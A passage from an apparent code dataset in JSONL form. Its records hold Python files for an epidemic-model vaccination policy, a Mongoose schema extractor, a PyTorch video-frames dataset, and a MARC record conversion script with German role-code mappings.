for A, 0.46 for S\n        # skip those with < 14 days\n\n        # for state, probs in (\n        #     (STATES.I_n, [0.29, 0.52, 0.9]),\n        #     (STATES.I_a, [0.46, 0.6, 0.92])\n        # ):\n        #     nodes_heading_to_state = nodes_first_E.copy()\n        #     nodes_heading_to_state[nodes_first_E] = self.model.state_to_go[nodes_first_E, 0] == state\n        #     node_list = self.nodes[nodes_heading_to_state]\n\n        #     if not(len(node_list) > 0):\n        #         continue\n        #     # skip those who are in first 14 days\n        #     node_list = node_list[self.vaccinated[node_list] >= 14]\n        #     # select 14 - 21\n        #     selected = node_list[self.vaccinated[node_list] < 21]\n        #     decide_move_to_R(selected, probs[0])\n        #     # skip them\n        #     node_list = node_list[self.vaccinated[node_list] >= 21]\n        #     # selecte < second shot + 7\n        #     selected = node_list[self.vaccinated[node_list] < self.delay + 7]\n        #     decide_move_to_R(selected, probs[1])\n        #     # skip them\n        #     node_list = node_list[self.vaccinated[node_list] >= self.delay + 7]\n        #     decide_move_to_R(node_list, probs[2])\n\n        # first shots\n\n        node_list = self.nodes[nodes_first_E]\n\n        if len(node_list) == 0:\n            return\n\n        # those who have only the first shot\n        first_shotters = node_list[\n            np.logical_and(\n                self.vaccinated[node_list] >= 14,\n                self.vaccinated[node_list] < self.delay + 7\n            )]\n        r = np.random.rand(len(first_shotters))\n        go_back = first_shotters[r < self.first_shot_coef]\n        self.target_for_R[go_back] = True\n\n        second_shotters = node_list[self.vaccinated[node_list]\n                                    >= self.delay + 7]\n        r = np.random.rand(len(second_shotters))\n        go_back = second_shotters[r < self.second_shot_coef]\n        self.target_for_R[go_back] = True\n\n        self.stat_moved_to_R[self.model.t] = self.target_for_R.sum()\n        self.model.move_target_nodes_to_S(self.target_for_R)\n        self.days_in_E[self.target_for_R] = 0\n\n    def process_vaccinated(self):\n        self.move_to_S()\n\n    def run(self):\n\n        super().run()\n\n        # update vaccinated days\n        already_vaccinated = self.vaccinated != -1\n        self.vaccinated[already_vaccinated] += 1\n\n        self.process_vaccinated()\n\n        # update asymptomatic rates - OBSOLETE\n        # I assume the vaccine has no effect in the first week, 50% after one\n        # week, 70% after two weeks, 90% after the second dose and 95% a week later\n\n        # older = self.graph.nodes_age > 65\n        # younger = np.logical_not(older)\n\n        # # update two weeks after first vaccination\n        # selected = self.vaccinated == 14\n        # self.model.asymptomatic_rate[np.logical_and(selected, older)] = 0.7\n        # self.model.asymptomatic_rate[np.logical_and(selected, younger)] = 0.9\n\n        # # update two weeks after second vaccination\n        # selected = self.vaccinated == self.delay + 14\n        # self.model.asymptomatic_rate[np.logical_and(selected, older)] = 0.8\n        # self.model.asymptomatic_rate[np.logical_and(selected, younger)] = 
0.95\n\n # selected = self.vaccinated == 7\n # self.model.asymptomatic_rate[selected] = 0.5\n # selected = self.vaccinated == 14\n # self.model.asymptomatic_rate[selected] = 0.7\n # selected = self.vaccinated == self.delay\n # self.model.asymptomatic_rate[selected] = 0.9\n # selected = self.vaccinated == self.delay + 7\n # self.model.asymptomatic_rate[selected] = 0.95\n\n logging.debug(f\"asymptomatic rate {self.model.asymptomatic_rate.mean()}\")\n\n if self.model.T in self.elderly_calendar:\n self.vaccinate_old(self.elderly_calendar[self.model.T])\n\n if self.model.T in self.workers_calendar:\n self.vaccinate_workers(self.workers_calendar[self.model.T])\n\n def vaccinate_old(self, num):\n if num == 0:\n return\n logging.info(f\"T={self.model.T} Vaccinating {num} elderly.\")\n index = len(self.old_to_vaccinate)\n while num > 0 and index > 0:\n index -= 1\n who = self.old_to_vaccinate[index]\n if self.vaccinated[who] != -1:\n continue\n if self.model.node_detected[who]: # change to active case\n continue\n # dead are not vaccinated\n if self.model.memberships[STATES.D, who, 0] == 1:\n continue\n self.vaccinated[who] = 0\n del self.old_to_vaccinate[index]\n num -= 1\n\n def vaccinate_workers(self, num):\n if num == 0:\n return\n logging.info(f\"T={self.model.T} Vaccinating {num} workers.\")\n num_workers = len(self.workers_to_vaccinate)\n if num_workers == 0:\n return\n\n # ids_to_vaccinate = self.workers_to_vaccinate[self.model.node_detected[self.workers_to_vaccinate] == False]\n # if len(ids_to_vaccinate) == 0:\n # logging.warning(\"No more workers to vaccinate.\")\n # exit()\n # return\n # ids_to_vaccinate = ids_to_vaccinate[self.model.memberships[STATES.D, ids_to_vaccinate, 0] != 1]\n\n ids_to_vaccinate = np.logical_and(\n self.model.node_detected[self.workers_to_vaccinate] == False,\n self.model.memberships[STATES.D, self.workers_to_vaccinate, 0] != 1\n ).nonzero()[0]\n\n if len(ids_to_vaccinate) < num:\n logging.info(\"Not enough workers to vaccinate.\")\n num = len(ids_to_vaccinate)\n if num == 0:\n return\n selected_ids = np.random.choice(\n ids_to_vaccinate, size=num, replace=False)\n for index in selected_ids:\n who = self.workers_to_vaccinate[index]\n self.vaccinated[who] = 0\n for index in sorted(selected_ids, reverse=True):\n del self.workers_to_vaccinate[index]\n\n # # get all nodes that are S or Ss and were not vaccinated\n # target_nodes = np.logical_not(\n # self.model.node_detected\n # )\n # target_nodes = np.logical_and(\n # target_nodes[:,0],\n # self.vaccinated == False\n # )\n # print(target_nodes.shape)\n # pool = self.nodes[target_nodes]\n\n # # select X of them to be vaccinated\n # to_vaccinate = np.random.choice(pool, size=self.num_to_vaccinate, replace=False)\n # self.vaccinated[to_vaccinate] = True\n # self.model.asymptomatic_rate[to_vaccinate] = 0.9\n\n # # self.model.move_to_R(to_vaccinate)\n\n def to_df(self):\n index = range(0+self.model.start_day-1, self.model.t +\n self.model.start_day) # -1 + 1\n policy_name = type(self).__name__\n columns = {\n f\"moved_to_R\": self.stat_moved_to_R[:self.model.t+1],\n }\n columns[\"day\"] = np.floor(index).astype(int)\n df = pd.DataFrame(columns, index=index)\n df.index.rename('T', inplace=True)\n return df\n\n\nclass VaccinationToR(Vaccination):\n\n def process_vaccinated(self):\n # # update two weeks after first vaccination\n nodes_in_S = self.nodes[self.model.memberships[STATES.S, :, 0] == 1]\n\n selected = nodes_in_S[self.vaccinated[nodes_in_S] == 14]\n r = np.random.rand(len(selected))\n to_R = selected[r < 
self.first_shot_coef]\n\n self.target_for_R.fill(0)\n self.target_for_R[to_R] = True\n\n selected = nodes_in_S[self.vaccinated[nodes_in_S] == self.delay + 7]\n r = np.random.rand(len(selected))\n to_R = selected[r < (self.second_shot_coef - self.first_shot_coef)]\n self.target_for_R[to_R] = True\n\n self.stat_moved_to_R[self.model.t] = self.target_for_R.sum()\n self.model.move_target_nodes_to_R(self.target_for_R)\n self.days_in_E[self.target_for_R] = 0\n\n\nclass VaccinationToA(Vaccination):\n\n def update_asymptomatic_rates(self):\n # # update two weeks after first vaccination\n selected = self.nodes[self.vaccinated == 14]\n srate = 1 - 0.179\n self.model.asymptomatic_rate[selected] = 1 - \\\n srate*(1-self.first_shot_coef)\n\n selected = self.nodes[self.vaccinated == self.delay + 7]\n self.model.asymptomatic_rate[selected] = 1 - \\\n srate*(1-self.second_shot_coef)\n\n def process_vaccinated(self):\n self.update_asymptomatic_rates()\n\n\nclass VaccinationToSA(VaccinationToA):\n\n def process_vaccinated(self):\n self.move_to_S()\n self.update_asymptomatic_rates()\n","repo_name":"epicity-cz/model-m","sub_path":"src/policies/vaccination.py","file_name":"vaccination.py","file_ext":"py","file_size_in_byte":13000,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"38"} +{"seq_id":"19188760813","text":"import json\nimport sqlite3\nfrom xmlrpc.client import Boolean\nimport esprima\nPATH = 'PATHTOSCHEMAFILE'\n\n\ndef give_schema_ast(node):\n if node.type == \"Program\":\n return give_schema_ast(node.body[0])\n\n elif node.type == \"ExpressionStatement\":\n return give_schema_ast(node.expression)\n\n elif node.type == \"NewExpression\":\n if node.callee.name == \"Schema\":\n return give_schema_ast(node.arguments[0])\n \n elif node.type == \"CallExpression\":\n if node.callee.property.name == \"Schema\":\n return node.arguments[0]\n\n else:\n return node\n\n\n\ndef visit_schema(node):\n if node.type == \"ObjectExpression\":\n return {name: value for name, value in [visit_schema(prop) for prop in node.properties]}\n \n elif node.type == \"Property\":\n return visit_schema(node.key), visit_schema(node.value)\n \n #leaf literal\n elif node.type == \"Literal\":\n return node.value\n\n elif node.type == \"MemberExpression\":\n return visit_schema(node.object) + \".\" + visit_schema(node.property)\n \n #leafidentifier\n elif node.type == \"Identifier\":\n return node.name\n \n #just before leaf, next el should always be leaf\n elif node.type == \"ArrayExpression\":\n return [visit_schema(el) for el in node.elements]\n \n #In case they define a schema inside the schema\n elif node.type == \"NewExpression\":\n return visit_schema(node.arguments[0])\n\n\ndef get_schema_dict(file_path, coordinates):\n \"\"\"\n Returns the dict corresponding to schema at the given location\n\n parameters:\n -----------\n file_path: path to the file (str)\n coordinates: [start_line, start_column, end_line, end_column]\n\n returns:\n --------\n schema_dict: schema corresponding to the dict at the given location\n \"\"\"\n start_line, start_column, end_line, end_column = coordinates\n schema = ''\n with open(file_path, 'r') as f:\n for i in range(end_line):\n if i >= start_line-1:\n line = f.readline()\n if i == start_line-1:\n line = line[start_column-1:]\n elif i == end_line-1:\n line = line[:end_column]\n schema += line\n \n else:\n f.readline()\n tree_out = esprima.parseScript(schema)\n schema_tree = give_schema_ast(tree_out)\n return visit_schema(schema_tree)\nacc = []\ndef 
gather_attribute_names(schema_dict):\n \"\"\"\n gather attribute names from a specific schema dict\n\n parameters:\n -----------\n schema_dict : dict holding a mongoose schema (dict)\n\n returns:\n ---------\n None; attribute names are appended to the module-level list ``acc``\n \"\"\"\n\n if type(schema_dict) == list:\n [gather_attribute_names(el) for el in schema_dict]\n elif type(schema_dict) == dict:\n for key in schema_dict:\n if key not in ['type', 'default', 'enum', 'ref', 'index', 'alias']:\n acc.append(key)\n gather_attribute_names(schema_dict[key])\n\n","repo_name":"anoauthor/SCAM_online_appendix_274","sub_path":"codeQL_queries/javascript/python_scripts/extract_mongoose_schema.py","file_name":"extract_mongoose_schema.py","file_ext":"py","file_size_in_byte":3050,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"1096143705","text":"import os\nimport PIL\nimport json\nimport numpy as np\nfrom PIL import Image\nfrom random import shuffle\nfrom src.utils import get_logger\n\nimport torch\nimport torchvision\nfrom torchvision import transforms\nfrom torch.utils.data import Dataset\n\ndef random_crop(cur_img):\n width, height = cur_img.size\n # trim odd dimensions so the crop arithmetic below stays integral\n if width % 2 == 1:\n width -= 1\n if height % 2 == 1:\n height -= 1\n # random crop\n if width == height:\n # already square: just trim to the even size and keep the PIL image,\n # so the torchvision transforms downstream receive a consistent type\n return cur_img.crop((0, 0, width, height))\n elif width < height:\n diff = height - width\n move = np.random.choice(diff) - diff // 2\n left, right = 0, width\n top = (height - width) // 2 + move\n bottom = (height + width) // 2 + move\n else:\n diff = width - height\n move = np.random.choice(diff) - diff // 2\n top, bottom = 0, height\n left = (width - height) // 2 + move\n right = (width + height) // 2 + move\n\n cur_img = cur_img.crop((left, top, right, bottom))\n return cur_img\n\ndef center_crop(img):\n # center crop\n w, h = img.size\n minl = min(h, w)\n left = (w - minl) / 2\n right = (w + minl) / 2\n top = (h - minl) / 2\n bottom = (h + minl) / 2\n img = img.crop((left, top, right, bottom))\n return img\n\n\nclass VideoFramesDataset(Dataset):\n def __init__(self, datapath, idspath, img_size, num_frames):\n super().__init__()\n\n self.img_size = img_size\n self.json_path = idspath\n self.frame_path = datapath\n self.num_frames = num_frames\n\n self.video_ids = json.load(open(self.json_path, 'r'))\n self.transform = transforms.Compose([\n transforms.Resize((img_size, img_size),\n interpolation=PIL.Image.BILINEAR),\n transforms.ToTensor(),\n # transforms.Normalize(mean=[0.485, 0.456, 0.406],\n # std=[0.229, 0.224, 0.225])\n ])\n\n logger = get_logger()\n logger.info(f\"{len(self.video_ids)} videos from datapath {datapath}, \"\n f\"img_size: {img_size}, num_frames: {num_frames}\")\n\n\n def __len__(self):\n return len(self.video_ids)\n\n def skip_sample(self, ind):\n if ind >= self.__len__() - 1:\n return self.__getitem__(0)\n return self.__getitem__(ind + 1)\n\n def __getitem__(self, index):\n video_id = self.video_ids[index]\n\n # randomly select num_frames consecutive frames\n imgs = []\n cur_path = os.path.join(self.frame_path, video_id)\n files = sorted(os.listdir(cur_path))\n if len(files) == self.num_frames:\n start = 0\n else:\n start = np.random.choice(range(len(files) - self.num_frames))\n\n for file in files[start : start + self.num_frames]:\n img_path = os.path.join(cur_path, file)\n img = Image.open(img_path)\n img = random_crop(img)\n cur_img = self.transform(img).unsqueeze(0)\n imgs.append(cur_img)\n\n # concatenate\n ret_imgs = torch.cat(imgs, dim=0)\n 
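        # shape note: each element of imgs is [1, C, H, W], so after the cat
        # above ret_imgs is [T, C, H, W]; the batch dimension in the comment
        # below is added later by the DataLoader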
return ret_imgs # [B,T,C,H,W]\n\n\n# if __name__ == \"__main__\":\n# ds = VideoFramesDataset(datapath='/home/zhongguokexueyuanzidonghuayanjiusuo/datasets/msrvtt/frames',\n# idspath='/home/zhongguokexueyuanzidonghuayanjiusuo/datasets/msrvtt/train_frames_ids.json',\n# lq_img_size=128, gt_img_size=256)\n# lq_imgs, gt_imgs = ds[0]\n# print(lq_imgs.shape)\n# print(gt_imgs.shape)\n","repo_name":"iva-mzsun/MOSO","sub_path":"MOSO-VQVAE/src/dataset/VideoFramesDataset.py","file_name":"VideoFramesDataset.py","file_ext":"py","file_size_in_byte":3528,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"38"} +{"seq_id":"40951046428","text":"#!/usr/bin/python3\n\nimport argparse\nimport sys\nimport json\nimport pymarc\nimport traceback\n\nfrom pymarc.exceptions import RecordLengthInvalid, RecordLeaderInvalid, BaseAddressNotFound, BaseAddressInvalid, RecordDirectoryInvalid, NoFieldsFound\n\nfrom multiprocessing import Pool, Lock\n\n\nrolemapping = {\n \"abr\": \"KürzendeR\",\n \"acp\": \"HerstellerIn von Nachbildungen\",\n \"act\": \"SchauspielerIn\",\n \"adi\": \"Art Director\",\n \"adp\": \"BearbeiterIn\",\n \"aft\": \"VerfasserIn eines Nachworts\",\n \"anl\": \"AnalytikerIn\",\n \"anm\": \"TrickfilmzeichnerIn\",\n \"ann\": \"KommentatorIn\",\n \"ant\": \"BibliographischeR VorgängerIn\",\n \"ape\": \"BerufungsbeklagteR/RevisionsbeklagteR\",\n \"apl\": \"BerufungsklägerIn/RevisionsklägerIn\",\n \"app\": \"AntragstellerIn\",\n \"aqt\": \"AutorIn von Zitaten oder Textabschnitten\",\n \"arc\": \"ArchitektIn\",\n \"ard\": \"künstlerische Leitung\",\n \"arr\": \"ArrangeurIn\",\n \"art\": \"KünstlerIn\",\n \"asg\": \"RechtsnachfolgerIn\",\n \"asn\": \"zugehöriger Name\",\n \"ato\": \"AutographIn\",\n \"att\": \"zugehöriger Name\",\n \"auc\": \"AuktionatorIn\",\n \"aud\": \"AutorIn des Dialogs\",\n \"aui\": \"VerfasserIn eines Geleitwortes\",\n \"aus\": \"DrehbuchautorIn\",\n \"aut\": \"VerfasserIn\",\n \"bdd\": \"BindungsgestalterIn\",\n \"bjd\": \"EinbandgestalterIn\",\n \"bkd\": \"BuchgestalterIn\",\n \"bkp\": \"BuchherstellerIn\",\n \"blw\": \"AutorIn des Klappentextes\",\n \"bnd\": \"BuchbinderIn\",\n \"bpd\": \"GestalterIn des Exlibris\",\n \"brd\": \"Sender\",\n \"brl\": \"BrailleschriftprägerIn\",\n \"bsl\": \"BuchhändlerIn\",\n \"cas\": \"FormgießerIn\",\n \"ccp\": \"konzeptionelle Leitung\",\n \"chr\": \"ChoreografIn\",\n \"clb\": \"MitarbeiterIn\",\n \"cli\": \"KlientIn, AuftraggeberIn\",\n \"cll\": \"KalligrafIn\",\n \"clr\": \"KoloristIn\",\n \"clt\": \"LichtdruckerIn\",\n \"cmm\": \"KommentatorIn\",\n \"cmp\": \"KomponistIn\",\n \"cmt\": \"SchriftsetzerIn\",\n \"cnd\": \"DirigentIn\",\n \"cng\": \"Kameramann/frau\",\n \"cns\": \"ZensorIn\",\n \"coe\": \"BerufungsbeklagteR im streitigen Verfahren\",\n \"col\": \"SammlerIn\",\n \"com\": \"ZusammenstellendeR\",\n \"con\": \"KonservatorIn\",\n \"cor\": \"SammlungskuratorIn\",\n \"cos\": \"AnfechtendeR, bestreitende Partei\",\n \"cot\": \"BerufungsklägerIn im streitigen Verfahren\",\n \"cou\": \"zuständiges Gericht\",\n \"cov\": \"UmschlaggestalterIn\",\n \"cpc\": \"BeansprucherIn des Urheberrechts\",\n \"cpe\": \"BeschwerdeführerIn-BerufungsbeklagteR\",\n \"cph\": \"InhaberIn des Urheberrechts\",\n \"cpl\": \"BeschwerdeführerIn/KlägerIn\",\n \"cpt\": \"KlägerIn/BerufungsklägerIn\",\n \"cre\": \"GeistigeR SchöpferIn\",\n \"crp\": \"KorrespondentIn\",\n \"crr\": \"KorrektorIn\",\n \"crt\": \"GerichtsstenografIn\",\n \"csl\": \"BeraterIn\",\n \"csp\": \"ProjektberaterIn\",\n \"cst\": \"KostümbildnerIn\",\n 
\"ctb\": \"MitwirkendeR\",\n \"cte\": \"AnfechtungsgegnerIn-BerufungsbeklagteR\",\n \"ctg\": \"KartografIn\",\n \"ctr\": \"VertragspartnerIn\",\n \"cts\": \"AnfechtungsgegnerIn\",\n \"ctt\": \"AnfechtungsgegnerIn-BerufungsklägerIn\",\n \"cur\": \"KuratorIn\",\n \"cwt\": \"KommentatorIn\",\n \"dbp\": \"Erscheinungsort\",\n \"dfd\": \"AngeklagteR/BeklagteR\",\n \"dfe\": \"AngeklagteR/BeklagteR-BerufungsbeklagteR\",\n \"dft\": \"AngeklagteR/BeklagteR-BerufungsklägerIn\",\n \"dgg\": \"Grad-verleihende Institution\",\n \"dgs\": \"AkademischeR BetreuerIn\",\n \"dir\": \"Dirigent\",\n \"dis\": \"PromovierendeR\",\n \"dln\": \"VorzeichnerIn\",\n \"dnc\": \"TänzerIn\",\n \"dnr\": \"GeldgeberIn\",\n \"dpc\": \"AbgebildeteR\",\n \"dpt\": \"AnlegerIn\",\n \"drm\": \"TechnischeR ZeichnerIn\",\n \"drt\": \"RegisseurIn\",\n \"dsr\": \"DesignerIn\",\n \"dst\": \"Vertrieb\",\n \"dtc\": \"BereitstellerIn von Daten\",\n \"dte\": \"WidmungsempfängerIn\",\n \"dtm\": \"DatenmanagerIn\",\n \"dto\": \"WidmendeR\",\n \"dub\": \"angeblicheR AutorIn\",\n \"edc\": \"BearbeiterIn der Zusammenstellung\",\n \"edm\": \"CutterIn\",\n \"edt\": \"HerausgeberIn\",\n \"egr\": \"StecherIn\",\n \"elg\": \"ElektrikerIn\",\n \"elt\": \"GalvanisiererIn\",\n \"eng\": \"IngenieurIn\",\n \"enj\": \"Normerlassende Gebietskörperschaft\",\n \"etr\": \"RadiererIn\",\n \"evp\": \"Veranstaltungsort\",\n \"exp\": \"ExperteIn\",\n \"fac\": \"FacsimilistIn\",\n \"fds\": \"Filmvertrieb\",\n \"fld\": \"BereichsleiterIn\",\n \"flm\": \"BearbeiterIn des Films\",\n \"fmd\": \"FilmregisseurIn\",\n \"fmk\": \"FilmemacherIn\",\n \"fmo\": \"frühereR BesitzerIn\",\n \"fmp\": \"FilmproduzentIn\",\n \"fnd\": \"GründerIn\",\n \"fpy\": \"Erste Partei\",\n \"frg\": \"FälscherIn\",\n \"gis\": \"GeographIn\",\n \"grt\": \"GraphischeR TechnikerIn\",\n \"hg\": \"Herausgeber\",\n \"his\": \"Gastgebende Institution\",\n \"hnr\": \"GefeierteR\",\n \"hst\": \"GastgeberIn\",\n \"Ill\": \"Illustrator\",\n \"ill\": \"IllustratorIn\",\n \"ilu\": \"Illuminator, BuchmalerIn\",\n \"ins\": \"InserierendeR\",\n \"inv\": \"ErfinderIn\",\n \"isb\": \"Herausgebendes Organ\",\n \"itr\": \"InstrumentalmusikerIn\",\n \"ive\": \"InterviewteR\",\n \"ivr\": \"InterviewerIn\",\n \"jud\": \"RichterIn\",\n \"jug\": \"zuständige Gerichtsbarkeit\",\n \"kad\": \"Kadenzverfasser\",\n \"lbr\": \"Labor\",\n \"lbt\": \"LibrettistIn\",\n \"ldr\": \"Laborleitung\",\n \"led\": \"Führung\",\n \"lee\": \"Libelee-appellee\",\n \"lel\": \"BeklagteR im Seerecht/Kirchenrecht\",\n \"len\": \"LeihgeberIn\",\n \"let\": \"Libelee-appellant\",\n \"lgd\": \"LichtgestalterIn\",\n \"lie\": \"Libelant-appellee\",\n \"lil\": \"KlägerIn im Seerecht/Kirchenrecht\",\n \"lit\": \"Libelant-appellant\",\n \"lsa\": \"LandschaftsarchitektIn\",\n \"lse\": \"LizenznehmerIn\",\n \"lso\": \"LizenzgeberIn\",\n \"ltg\": \"LithographIn\",\n \"lyr\": \"TextdichterIn\",\n \"mcp\": \"ArrangeurIn, Notenleser/-schreiberIn\",\n \"mdc\": \"Metadatenkontakt\",\n \"med\": \"Medium\",\n \"mfp\": \"Herstellungsort\",\n \"mfr\": \"HerstellerIn\",\n \"mod\": \"ModeratorIn\",\n \"mon\": \"BeobachterIn\",\n \"mrb\": \"MarmorarbeiterIn, MarmoriererIn\",\n \"mrk\": \"Markup-EditorIn\",\n \"msd\": \"MusikalischeR LeiterIn\",\n \"mte\": \"Metall-GraveurIn\",\n \"mtk\": \"ProtokollantIn\",\n \"mus\": \"MusikerIn\",\n \"nrt\": \"ErzählerIn\",\n \"opn\": \"GegnerIn\",\n \"org\": \"UrheberIn\",\n \"orm\": \"VeranstalterIn\",\n \"osp\": \"On-screen PräsentatorIn\",\n \"oth\": \"BerichterstatterIn\",\n \"own\": \"BesitzerIn\",\n \"pan\": 
\"DiskussionsteilnehmerIn\",\n \"pat\": \"SchirmherrIn\",\n \"pbd\": \"Verlagsleitung\",\n \"pbl\": \"Verlag\",\n \"pdr\": \"Projektleitung\",\n \"pfr\": \"Korrektur\",\n \"pht\": \"FotografIn\",\n \"plt\": \"DruckformherstellerIn\",\n \"pma\": \"Genehmigungsstelle\",\n \"pmn\": \"Produktionsleitung\",\n \"pop\": \"PlattendruckerIn\",\n \"ppm\": \"PapiermacherIn\",\n \"ppt\": \"PuppenspielerIn\",\n \"pra\": \"Praeses\",\n \"prc\": \"Prozesskontakt\",\n \"prd\": \"Produktionspersonal\",\n \"pre\": \"PräsentatorIn\",\n \"prf\": \"AusführendeR\",\n \"prg\": \"ProgrammiererIn\",\n \"prm\": \"DruckgrafikerIn\",\n \"prn\": \"Produktionsfirma\",\n \"pro\": \"ProduzentIn\",\n \"prp\": \"Produktionsort\",\n \"prs\": \"SzenenbildnerIn\",\n \"prt\": \"DruckerIn\",\n \"prv\": \"AnbieterIn\",\n \"pta\": \"PatentanwärterIn\",\n \"pte\": \"KlägerIn-BerufungsbeklagteR\",\n \"ptf\": \"ZivilklägerIn\",\n \"pth\": \"PatentinhaberIn\",\n \"ptt\": \"KlägerIn-BerufungsklägerIn\",\n \"pup\": \"Veröffentlichungsort\",\n \"rbr\": \"RubrikatorIn\",\n \"rcd\": \"TonmeisterIn\",\n \"rce\": \"ToningenieurIn\",\n \"rcp\": \"AdressatIn\",\n \"rdd\": \"HörfunkregisseurIn\",\n \"Red\": \"Redakteur\",\n \"red\": \"RedakteurIn\",\n \"ren\": \"RendererIn (Bildverarbeitung)\",\n \"res\": \"ForscherIn\",\n \"rev\": \"RezensentIn, GutachterIn\",\n \"rpc\": \"HörfunkproduzentIn\",\n \"rps\": \"Aufbewahrungsort, TreuhänderIn\",\n \"rpt\": \"ReporterIn\",\n \"rpy\": \"Verantwortliche Partei\",\n \"rse\": \"AntragsgegnerIn-BerufungsbeklagteR\",\n \"rsg\": \"RegisseurIn der Wiederaufführung\",\n \"rsp\": \"RespondentIn\",\n \"rsr\": \"RestauratorIn\",\n \"rst\": \"AntragsgegnerIn-BerufungsklägerIn\",\n \"rth\": \"Leitung des Forschungsteams\",\n \"rtm\": \"Mitglied des Forschungsteams\",\n \"sad\": \"WissenschaftlicheR BeraterIn\",\n \"sce\": \"DrehbuchautorIn\",\n \"scl\": \"BildhauerIn\",\n \"scr\": \"SchreiberIn\",\n \"sds\": \"Tongestalter\",\n \"sec\": \"SekretärIn\",\n \"sgd\": \"BühnenregisseurIn\",\n \"sgn\": \"UnterzeichnerIn\",\n \"sht\": \"Unterstützender Veranstalter\",\n \"sll\": \"VerkäuferIn\",\n \"sng\": \"SängerIn\",\n \"spk\": \"RednerIn\",\n \"spn\": \"SponsorIn\",\n \"spy\": \"Zweite Partei\",\n \"srv\": \"LandvermesserIn\",\n \"std\": \"BühnenbildnerIn\",\n \"stg\": \"Kulisse\",\n \"stl\": \"GeschichtenerzählerIn\",\n \"stm\": \"InszenatorIn\",\n \"stn\": \"Normungsorganisation\",\n \"str\": \"StereotypeurIn\",\n \"tcd\": \"Technische Leitung\",\n \"tch\": \"LehrerIn\",\n \"ths\": \"BetreuerIn (Doktorarbeit)\",\n \"tld\": \"FernsehregisseurIn\",\n \"tlp\": \"FernsehproduzentIn\",\n \"trc\": \"TranskribiererIn\",\n \"trl\": \"ÜbersetzerIn\",\n \"tyd\": \"Schrift-DesignerIn\",\n \"tyg\": \"SchriftsetzerIn\",\n \"uvp\": \"Hochschulort\",\n \"vac\": \"SynchronsprecherIn\",\n \"vdg\": \"BildregisseurIn\",\n \"voc\": \"VokalistIn\",\n \"wac\": \"KommentarverfasserIn\",\n \"wal\": \"VerfasserIn von zusätzlichen Lyrics\",\n \"wam\": \"AutorIn des Begleitmaterials\",\n \"wat\": \"VerfasserIn von Zusatztexten\",\n \"wdc\": \"HolzschneiderIn\",\n \"wde\": \"HolzschnitzerIn\",\n \"win\": \"VerfasserIn einer Einleitung\",\n \"wit\": \"ZeugeIn\",\n \"wpr\": \"VerfasserIn eines Vorworts\",\n \"wst\": \"VerfasserIn von ergänzendem Text\"\n}\n\nbaseuri = \"http://data.finc.info/resources/\"\n\n\nprop2isil = {\"swb_id_str\": \"(DE-576)\",\n \"kxp_id_str\": \"(DE-627)\"\n }\n\n\ndef fixRecord(record=\"\", record_id=0, validation=False, replaceMethod='decimal'):\n replaceMethods = {\n 'decimal': (('#29;', '#30;', '#31;'), 
(\"\\x1D\", \"\\x1E\", \"\\x1F\")),\n 'unicode': (('\\u001d', '\\u001e', '\\u001f'), (\"\\x1D\", \"\\x1E\", \"\\x1F\")),\n 'hex': (('\\x1D', '\\x1E', '\\x1F'), (\"\\x1D\", \"\\x1E\", \"\\x1F\"))\n }\n marcFullRecordFixed=record\n for i in range(0, 3):\n marcFullRecordFixed=marcFullRecordFixed.replace(replaceMethods.get(replaceMethod)[0][i], replaceMethods.get(replaceMethod)[1][i])\n if validation:\n try:\n reader = pymarc.MARCReader(marcFullRecordFixed.encode('utf8'), utf8_handling='replace')\n marcrecord = next(reader)\n except (RecordLengthInvalid, RecordLeaderInvalid, BaseAddressNotFound, BaseAddressInvalid, RecordDirectoryInvalid, NoFieldsFound, UnicodeDecodeError) as e:\n eprint(\"record id {0}:\".format(record_id)+str(e))\n with open('invalid_records.txt', 'a') as error:\n # plain print here: eprint() already passes file=sys.stderr, so\n # forwarding file=error through it would raise a TypeError\n print(marcFullRecordFixed, file=error)\n return None\n return marcFullRecordFixed\n\n\ndef ArrayOrSingleValue(array):\n '''\n return an array\n if there is only a single value, only return that single value\n '''\n if isinstance(array, (int, float)):\n return array\n if array:\n length = len(array)\n if length > 1 or isinstance(array, dict):\n return array\n elif length == 1:\n for elem in array:\n return elem\n elif length == 0:\n return None\n\n\ndef eprint(*args, **kwargs):\n '''\n print to stderr\n '''\n print(*args, file=sys.stderr, **kwargs)\n\n\ndef getIDs(record, prop):\n if isinstance(prop, str):\n if prop in prop2isil and prop in record:\n return str(prop2isil[prop]+record[prop])\n elif prop in record and not prop in prop2isil:\n return str(record[prop])\n elif isinstance(prop, list):\n ret = []\n for elem in prop:\n if elem in prop2isil and elem in record:\n ret.append(str(prop2isil[elem]+record[elem]))\n elif elem in record and not elem in prop2isil:\n ret.append(record[elem])\n if ret:\n return ret\n\n\ndef getoAC(record, prop):\n if isinstance(record.get(prop), str):\n if record.get(prop) == \"Free\":\n return \"Yes\"\n elif isinstance(record.get(prop), list):\n for elem in record.get(prop):\n if elem == \"Free\":\n return \"Yes\"\n\n\ndef getAtID(record, prop):\n if record.get(prop):\n return baseuri+record[prop]\n\n\ndef getGND(record, prop):\n ret = []\n if isinstance(record.get(prop), str):\n return \"http://d-nb.info/gnd/\"+record.get(prop)\n elif isinstance(record.get(prop), list):\n for elem in record.get(prop):\n ret.append(\"http://d-nb.info/gnd/\"+elem)\n if ret:\n return ret\n else:\n return None\n\n\ndef getLanguage(record, prop):\n lang = getProperty(record, prop)\n if lang:\n language = {\"en\": lang}\n return language\n\n\ndef getTitle(record, prop):\n title = getProperty(record, prop)\n if title:\n if isinstance(title, str):\n if title[-2:] == \" /\":\n title = title[:-2]\n elif isinstance(title, list):\n for n, elem in enumerate(title):\n if elem[-2:] == \" /\":\n title[n] = title[n][:-2]\n return title\n\n\ndef getformat(record, prop, formattable):\n if isinstance(record.get(prop), str) and record.get(prop) in formattable:\n return formattable.get(record.get(prop))\n elif isinstance(record.get(prop), list):\n for elem in record.get(prop):\n if elem in formattable:\n return formattable.get(elem)\n\n\ndef getFormatRdfType(record, prop):\n formatmapping = {\"Article, E-Article\": \"bibo:Article\",\n \"Book, E-Book\": \"bibo:Book\",\n \"Journal, E-Journal\": \"bibo:Periodical\",\n \"Manuscript\": \"bibo:Manuscript\",\n \"Map\": \"bibo:Map\",\n \"Thesis\": \"bibo:Thesis\",\n \"Video\": \"bibo:AudioVisualDocument\"\n }\n value = getformat(record, prop, formatmapping)\n if value:\n return 
